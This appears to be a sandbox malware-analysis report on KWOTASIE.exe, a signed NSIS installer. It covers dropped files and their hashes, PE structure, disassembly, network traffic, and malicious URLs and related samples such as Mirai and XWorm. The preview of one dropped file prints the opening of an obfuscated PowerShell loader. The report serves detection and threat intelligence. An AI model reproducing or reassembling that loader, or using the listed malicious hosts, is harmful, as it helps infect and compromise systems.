	https://docs.google.com/forms/d/e/1FAIpQLSdxwlJ42E7IP7P7FI5J10LvcZM2xU4rjZus8shJYViiMODIbA/viewform?pli=1	Get hash	malicious	Unknown	Browse	199.232.210.172
	http://polyfill.io/	Get hash	malicious	Unknown	Browse	199.232.210.172
	https://aradcofeenet1.aradcofeenet1.workers.dev/	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://a289.dvq.workers.dev/	Get hash	malicious	Unknown	Browse	199.232.214.172
	http://pub-5d5794a1344e4ef09c0d498cb30f8875.r2.dev/index.html	Get hash	malicious	Unknown	Browse	199.232.210.172
	http://pub-72f4175190054b068a6db1f116f55ca9.r2.dev/index.html	Get hash	malicious	Unknown	Browse	199.232.214.172

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CKL1-ASNKE	mirai.x86.elf	Get hash	malicious	Mirai	Browse	102.238.199.112
	jew.arm.elf	Get hash	malicious	Unknown	Browse	102.213.201.15
	XNP1BNVNqi.elf	Get hash	malicious	Mirai	Browse	102.236.154.57
	GIW8jzBGQQ.elf	Get hash	malicious	Mirai, Moobot	Browse	102.3.158.63
	SR9qYL1hLF.elf	Get hash	malicious	Mirai, Moobot	Browse	102.197.152.10
	DCwYFBy6z7.elf	Get hash	malicious	Mirai, Moobot	Browse	102.3.230.182
	enjTj0J3qX.elf	Get hash	malicious	Mirai, Moobot	Browse	102.208.4.118
	yUFX4wGvLW.elf	Get hash	malicious	Mirai, Moobot	Browse	102.205.164.182
	CDMZxujRpn.elf	Get hash	malicious	Mirai	Browse	102.234.203.106
	owONvNMYXu.elf	Get hash	malicious	Mirai	Browse	102.2.18.109
xneeloZA	hmips.elf	Get hash	malicious	Mirai	Browse	156.38.239.164
	ywX6tbIdM4.elf	Get hash	malicious	Mirai, Gafgyt	Browse	156.38.239.159
	McEifYLrJn.elf	Get hash	malicious	Mirai, Gafgyt	Browse	41.203.27.58
	UdjXCm3X2k.elf	Get hash	malicious	Mirai, Gafgyt	Browse	156.38.239.173
	3vnlP8ewPQ.elf	Get hash	malicious	Mirai, Gafgyt	Browse	156.38.239.176
	d694nfRb7c.elf	Get hash	malicious	Mirai, Gafgyt	Browse	156.38.239.158
	mips.elf	Get hash	malicious	Mirai, Gafgyt	Browse	156.38.239.181
	i686.elf	Get hash	malicious	Gafgyt, Mirai	Browse	197.221.56.218
	xVGenvURjj.elf	Get hash	malicious	Mirai	Browse	156.38.239.153
	RFQ - 122.exe	Get hash	malicious	AgentTesla	Browse	102.130.114.30
TUT-ASUS	ServerManager.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	MicrosoftService.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	F.exe	Get hash	malicious	AsyncRAT, Neshta, XWorm	Browse	208.95.112.1
	x.exe	Get hash	malicious	AsyncRAT, Neshta, XWorm	Browse	208.95.112.1
	java_update.exe	Get hash	malicious	AsyncRAT, Neshta, XWorm	Browse	208.95.112.1
	Roblox Account Manager.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	x433.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	DriverUpdt.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	rinvoice.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	rQuotation.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1

Process:	C:\Users\user\Desktop\KWOTASIE.exe
File Type:	data
Category:	dropped
Size (bytes):	301672
Entropy (8bit):	7.7512997637002945
Encrypted:	false
SSDEEP:	6144:rrNi8ksyxJSl71bC5jwYo7pT+hvRp5qdJt7oNkfU5ukZG:rpi8++1ObodT+15qdJMk85uB
MD5:	AF97A27E9A77A40937410A3F779CDDAC
SHA1:	6A3422BE55263976FA91D7A0F998AA74A5280E98
SHA-256:	5022B68F80E7FE5AAB1D8F15EEEADCF111A0000D890E855E73D083B5A872C0E4
SHA-512:	6A8FD4BF40BD6EE2BE51BE4DB5ED5F7E57DCC1E559BA02FC19DEB4374E21B985769003C7FBFCCE2B058A7E2F006CE5158E61F238A995D6DAEA45C3CF81AE287C
Malicious:	false
Reputation:	low
Preview:	..\\....................g....iiii...KKKK.H...........S............................{................)..x.....U.rr..........AA.oo.TTTT........................dd.........{....... .........`.....i..Z..............6.2.r.........n..........+...u....................ZZ...(.....66.000.............n.BB...........q...BB.....z.............V..H..........................f.......rr.........L........===...$$............r............................,................1.........^..................^^..A..eeee....................e........................JJJJ.CC........A.....t........AAAA...............E......z............j............,.....b..........H...f....................&...8............JJ..........\\\\\\\..YY.))).Y......GGG.....................5.....%..8...<<.g....i.......%%......$.99......n.33....6.rr....=.....f..---....................................T...........v................j...EE..5........II..ZZZZZ........B..,,.0.........}}............z.........zzzz.........^^^^^..............?......t.....q

C:\Users\user\AppData\Local\Innoxious\Phantasies.ude

Download File

Process:	C:\Users\user\Desktop\KWOTASIE.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	78801
Entropy (8bit):	5.142588222775932
Encrypted:	false
SSDEEP:	1536:o4Xtl8Bpx+qzIB9Sx/+6/3qt9S22qj39sL+NzfrR4LDmeOy9E4ilV6Jsp:ouULzIB9Bw3q2DL+l+me5036Cp
MD5:	31A731AA8D5E8D9C0A5187FF85A83CFF
SHA1:	BBD52C93350D12B643F854D05F6156444A8FE30D
SHA-256:	E2E9D9772728BC5C3272C18A0A4031104C88C0B8CF9507834A6881499BA12912
SHA-512:	9A7E3FE4EAEC8D6C47249C0E404CDD5A621B6528B978BC5E68BB3ED4E53AD5B8B6AFE4CF9898214247E746603B387FDF4253FD4E300C655B1025F3C616CAF4E3
Malicious:	true
Reputation:	low
Preview:	$Portliest=$Palladiums;<#Georgisme Hootches Sulfuric Nonvigilantness Welfares #><#Nonadmissible Efterladenskaben Sengepladserne Pediatrics Middelalderlige Forskningsraadenes #><#Neutrophilis Erythrosine Sluttotal Antianarchist Hypostasized #><#Masculinization Stokerfyrenes Malleifera Hved Acridness Thure #><#Cochleary Paediatrics Badgemen lseretarderede #><#Blusterers Fatalistens Registratorer Peroration Xerografis Fallents #>$Fntrrer = " Phantas;,npolish`$Bru,erfoOLargostilKursavand AlvorsmdTelotroca Opt getnNonstoicsQuipde,ekKirkemuseCentr lv=Udhamrea`$Semi,ubiPbehavio rSmrokkeroCystone,pHoldingsaF rehillg SkattetaLeveunhanBoxhaulsdEskadreriHeartt,rsHoactzintG nghameiPl.nlgnicGrandun,;HypalgesFLazinessudunhammenKanni alcExcogi.atHeresiariFarcerneo Selskabn command AfkobledPTurbomoteHan,urysrBeklagelu NonstralMamae,reaTa,esprotbwana.reeTankst t Autismdu(Variantk`$ Svovlp S Redni.gtRivebrtte .ivorcimTympanizn Drageeri Bandagin Nonac,egJerngrebsfri agdoms kkebreeImmens.rnSharpshonCoprop

C:\Users\user\AppData\Local\Innoxious\arbejdssociologens.huf

Download File

Process:	C:\Users\user\Desktop\KWOTASIE.exe
File Type:	data
Category:	dropped
Size (bytes):	936997
Entropy (8bit):	0.298558099617445
Encrypted:	false
SSDEEP:	768:rtdyfSIjRWNERrlhGOR7gj7q9I+fZAowJIkf/nhJVPSiYLpZfuh6+LIG8Ynqr82q:T
MD5:	4E084DB2E273E4A59020BBC29508AE81
SHA1:	D868209019D2A9D9A26B1F227F04EB9B219693E3
SHA-256:	C083DD714E70F5CC134C4089592E54B59AB41EEAF39C5B4E8790DD833AE44D3E
SHA-512:	C4CE5667908CEBE9EBD8D522A0EBEB22FEEA74660D50C2A455BFC725E622AADD74A7BA19A2B8049A13CFA549C35FD222D7E953F82F5040CD6A087804686783E1
Malicious:	false
Reputation:	low
Preview:	..............................................................................u.......................................................................................................................................................................................................................................................N..............................O...............................................................D........].................................................../.......................................................................................................................................................................................................................................................................................................................\..........................................................:.............................................................T........p...........................................................................

C:\Users\user\AppData\Local\Innoxious\codium.ant

Download File

Process:	C:\Users\user\Desktop\KWOTASIE.exe
File Type:	data
Category:	dropped
Size (bytes):	1213326
Entropy (8bit):	0.29589819793966354
Encrypted:	false
SSDEEP:	768:dA50+8EyTM35Je5aQLw16j5nQstwU+4Ub4oKHJZTdyreO+R3obqx1FALllowV+ZF:VwD
MD5:	6EC2BDAD06DDD76E3F6C1925058D2B73
SHA1:	4B5917C22D4742C3E633DEEEFE9C372B889B4D5F
SHA-256:	499C692019159C75D35F57BBA7424DA053F2E7E514A879CBB49EF80B1E1758EA
SHA-512:	0B847802F35711747788003BFB1CA9042CED842D9512FF3E5549DD68BABA81932F03F90E1FD152B4F83482FB077AE0FD15D54E84FEBB4D4FA00AA22203D37A75
Malicious:	false
Reputation:	low
Preview:	.......^...........................................................................................................................................................................................................................................................................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................S.....................................................................................................................................................................................{...............................................{......................................

C:\Users\user\AppData\Local\Innoxious\dumheds.txt

Download File

Process:	C:\Users\user\Desktop\KWOTASIE.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	453
Entropy (8bit):	4.303279922517871
Encrypted:	false
SSDEEP:	12:+MypCFpoUASwD4bVTNXoRL8u9EEW7rJCwrxjaH8n:+MypCf9AHeVNSFEE+rJCwr93n
MD5:	C54B2D7A94C9CFAA7CD36FBC7657E98C
SHA1:	3B176E45475756E5F5CBD08EECD767BDC8A3A7F4
SHA-256:	3192D10054DBD993F7040DD679E45C1EEDFC5957C460A0DC5258E3DE347A1FFC
SHA-512:	6647715D729BDB5A3C725146BA54980A349C7AB193D1D6C1F461D0697B290ECBB6E1DA6F09CFA7448E4D034B2981940880F456295E8FA05CF4C577E7396F6534
Malicious:	false
Reputation:	low
Preview:	gangliest indfrielsen overvrelses interviewmulighed,bassets svineholdets anamneses.challa superexcellence woodie titchfield subaffluently rapunslen.fuldfoders bikinis diamyl flyvecertifikat pledge buccally triplett helflaske worldwide protoparent..brightsome afkobles plaskvaad oxhorn kvadrattallene nonponderable nsten handelsrejses trictrac..eksternatskolers druggist kammerherreinders slinkiest materielkonstruktion reeksporterne systemsikkerhederne,

C:\Users\user\AppData\Local\Innoxious\fibrisers.fot

Download File

Process:	C:\Users\user\Desktop\KWOTASIE.exe
File Type:	data
Category:	dropped
Size (bytes):	1323921
Entropy (8bit):	0.29486482686325105
Encrypted:	false
SSDEEP:	768:zgyJwiL1/UO5DVuTBoD+ts/IoOAB3svpD6UMXB64ptzRRMBerLtyIjRFrh6ztQM/:n2WA
MD5:	F64A268611E960C62221020057669447
SHA1:	6C9C7EAE2CEF81D2368DC5B8E0E222D4EAD7089A
SHA-256:	E33F853D9809EA1AAA0B32BAEE9249915BBBA63DD7F72A86008E5EC1F335D069
SHA-512:	9356FBB9FCD2B045406A55C9779658F2314651FACC377B62D14ACC3B38E2B26309B1EBCC867AE5021F2B4ABF27BE85DE6E858837E3B940AE696D185462D1F9C4
Malicious:	false
Reputation:	low
Preview:	............................................................................................................Y..............................................................................................?.....................n......................................................................................................................................................................................V.............................................................................................................................................................................................................................................................................................:...7..................................m....................................................................F.....................................V...M.V.....P............................@......................................................................................................................

C:\Users\user\AppData\Local\Innoxious\induktionskogezoner.mid

Download File

Process:	C:\Users\user\Desktop\KWOTASIE.exe
File Type:	data
Category:	dropped
Size (bytes):	987571
Entropy (8bit):	0.299647195996518
Encrypted:	false
SSDEEP:	768:DSdZEZwfRWAyMufgApVv+BOXeWOJjNwq+bTEqeYvW+OHLSpgacX52fjWfd++Ler0:GbD
MD5:	321496DB5566568354AEE0164FE1711D
SHA1:	80A268D40DFCA8EAE08DE8D009853ACB05E299E8
SHA-256:	A8049A6F3660DA2F8DDB8E2E804BCB709C7E36085E522679F10EB6419B6CFF2B
SHA-512:	51E01D1EA24C66B7A82F65317946CEDCC871D1DE273C5CCCA825C06FA1D16961D9CFCF74E9C7D97DFFE1B26EE18518C323948C00C447BAE2D18584070AD7FC17
Malicious:	false
Reputation:	low
Preview:	.....................9.............................................................................................................................................................................^......................................T.......................................................................................................................................................................................................$.........................................................................~..................................................................................................c............................................................9.....................................................................................N..........................#.........................................................................................................................................................................................................`................

C:\Users\user\AppData\Local\Innoxious\kvindeemancipations.alt

Download File

Process:	C:\Users\user\Desktop\KWOTASIE.exe
File Type:	data
Category:	dropped
Size (bytes):	722954
Entropy (8bit):	0.30033785621806824
Encrypted:	false
SSDEEP:	768:tbEIn2OOKGDbP6TfldCh+dtNj4htOuut2g0NTULBEEuzkur2aY:FSc
MD5:	97320D366F806D4009691BB49138BC55
SHA1:	45DE76F8B18BA7E7871A13C0B2138A285C985DFD
SHA-256:	D25C0746F17E0A8BE051818909EFD7340368A0E897493ED2059A8D5C33267871
SHA-512:	2B38DB827EFF9D525316DA0EC02D911F9C37EB0BAA38311169EDA3110AA2F809C33A76FCC6F32931DD380C8BD067DE2344D15A50E53523FB2FA860F65B581AB9
Malicious:	false
Reputation:	low
Preview:	.........................................................................................................................................................................................................................l..........................................................................\|..........................................................................................................................................................................................................................................................:..............................................................c...........................................................................................................................................................................................F....................b........................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	8003
Entropy (8bit):	4.840877972214509
Encrypted:	false
SSDEEP:	192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
MD5:	106D01F562D751E62B702803895E93E0
SHA1:	CBF19C2392BDFA8C2209F8534616CCA08EE01A92
SHA-256:	6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
SHA-512:	81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dg2c4d2n.pyl.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wvqolrje.mkf.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.569090830267937
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	KWOTASIE.exe
File size:	982'616 bytes
MD5:	ecbec21dcfa39a1131d2a79acdf73f88
SHA1:	6b9366674e34118ec2881ab8d0ae5a5f5077a44d
SHA256:	ca595e27f24e0fc84bd5627ec36baae36bcc24018e638ed2ec7c7a6b1fe7b653
SHA512:	5158aa940a2779ef4fbb4874fbef55135754c33d3370f0c3f807c082dc268a63eab099f03b8b855a65bf41dd3cf683b8284b728719e6935835aa7920a5aa6b9c
SSDEEP:	24576:tzBRHciaGiPc8t11WID3jCJO30866tZPIJIRP6n:rRHciaGiL1MU2k3KSAJT
TLSH:	D8250287FA284192EC0D49F146BF5C67CE15BE2155523B3A6E67BB054DF3022D23B22B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...p..Y.................d...*.....

File Icon


Icon Hash:	47e132531196311f

Static PE Info

General

Entrypoint:	0x40333d
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x597FCC70 [Tue Aug 1 00:33:52 2017 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	b34f154ec913d2d2c435cbd644e91687

Authenticode Signature

Signature Valid:	false
Signature Issuer:	E=Essentializing@Kriminalistiske.Jak, O=Indfjelse, OU="Sammenstuv Hoopla ", CN=Indfjelse, L=Achille, S=Oklahoma, C=US
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	23/05/2024 09:06:02 23/05/2027 09:06:02
Subject Chain	E=Essentializing@Kriminalistiske.Jak, O=Indfjelse, OU="Sammenstuv Hoopla ", CN=Indfjelse, L=Achille, S=Oklahoma, C=US
Version:	3
Thumbprint MD5:	2C71F7B674852080C23D98B8870870C8
Thumbprint SHA-1:	4241C59FE0A56B2B1005ED05A2A7841CA1FA8C36
Thumbprint SHA-256:	23D182CC2442C7613AC110B685EB6FEA321A9A18288AD47BBCCE5D311E119308
Serial:	34B5172AADDD4EDF8DF429F5A17EAE8BFEAC0FE8

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+14h], ebx
mov dword ptr [esp+10h], 0040A2E0h
mov dword ptr [esp+1Ch], ebx
call dword ptr [004080A8h]
call dword ptr [004080A4h]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [0042A20Ch], eax
je 00007F4C888BF493h
push ebx
call 00007F4C888C2729h
cmp eax, ebx
je 00007F4C888BF489h
push 00000C00h
call eax
mov esi, 004082B0h
push esi
call 00007F4C888C26A3h
push esi
call dword ptr [00408150h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], 00000000h
jne 00007F4C888BF46Ch
push 0000000Ah
call 00007F4C888C26FCh
push 00000008h
call 00007F4C888C26F5h
push 00000006h
mov dword ptr [0042A204h], eax
call 00007F4C888C26E9h
cmp eax, ebx
je 00007F4C888BF491h
push 0000001Eh
call eax
test eax, eax
je 00007F4C888BF489h
or byte ptr [0042A20Fh], 00000040h
push ebp
call dword ptr [00408044h]
push ebx
call dword ptr [004082A0h]
mov dword ptr [0042A2D8h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebx
push 004216A8h
call dword ptr [00408188h]
push 0040A2C8h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x84fc	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x60000	0x5bba8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xee5f0	0x1868
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x626d	0x6400	b2dd5d917f94d75528a11411abe5681c	False	0.6569921875	data	6.423132440637118	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x138e	0x1400	2914bac53cd4485c9822093463e4eea6	False	0.4509765625	data	5.146454805063938	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x20318	0x600	c46c24ddc9bf88a6774bd207204164b9	False	0.4921875	data	3.906531854842304	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2b000	0x35000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x60000	0x5bba8	0x5bc00	e47ef02d4c8809b82823fbc6d27165c4	False	0.5386500553474114	data	6.341485897093692	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x60328	0x42028	Device independent bitmap graphic, 256 x 512 x 32, image size 270336	English	United States	0.4889265319407048
RT_ICON	0xa2350	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.6356323198864309
RT_ICON	0xb2b78	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.7203589985829003
RT_ICON	0xb6da0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.7454356846473029
RT_ICON	0xb9348	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.7938555347091932
RT_ICON	0xba3f0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.8266393442622951
RT_ICON	0xbad78	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.8714539007092199
RT_DIALOG	0xbb1e0	0x140	data	English	United States	0.46875
RT_DIALOG	0xbb320	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0xbb440	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0xbb508	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0xbb568	0x68	data	English	United States	0.7403846153846154
RT_VERSION	0xbb5d0	0x294	OpenPGP Secret Key	English	United States	0.5106060606060606
RT_MANIFEST	0xbb868	0x340	XML 1.0 document, ASCII text, with very long lines (832), with no line terminators	English	United States	0.5540865384615384

Imports

DLL	Import
KERNEL32.dll	SetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll	GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
ADVAPI32.dll	AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 2, 2024 08:14:30.690773964 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:30.695559025 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:30.695627928 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:30.695817947 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:30.700532913 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:31.656052113 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:31.656068087 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:31.656081915 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:31.656094074 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:31.656105995 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:31.656116962 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:31.656126976 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:31.656137943 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:31.656147957 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:31.656160116 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:31.656188011 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:31.656258106 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:31.661001921 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:31.661052942 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:31.661065102 CEST	80	49714	102.218.215.35	192.168.2.5
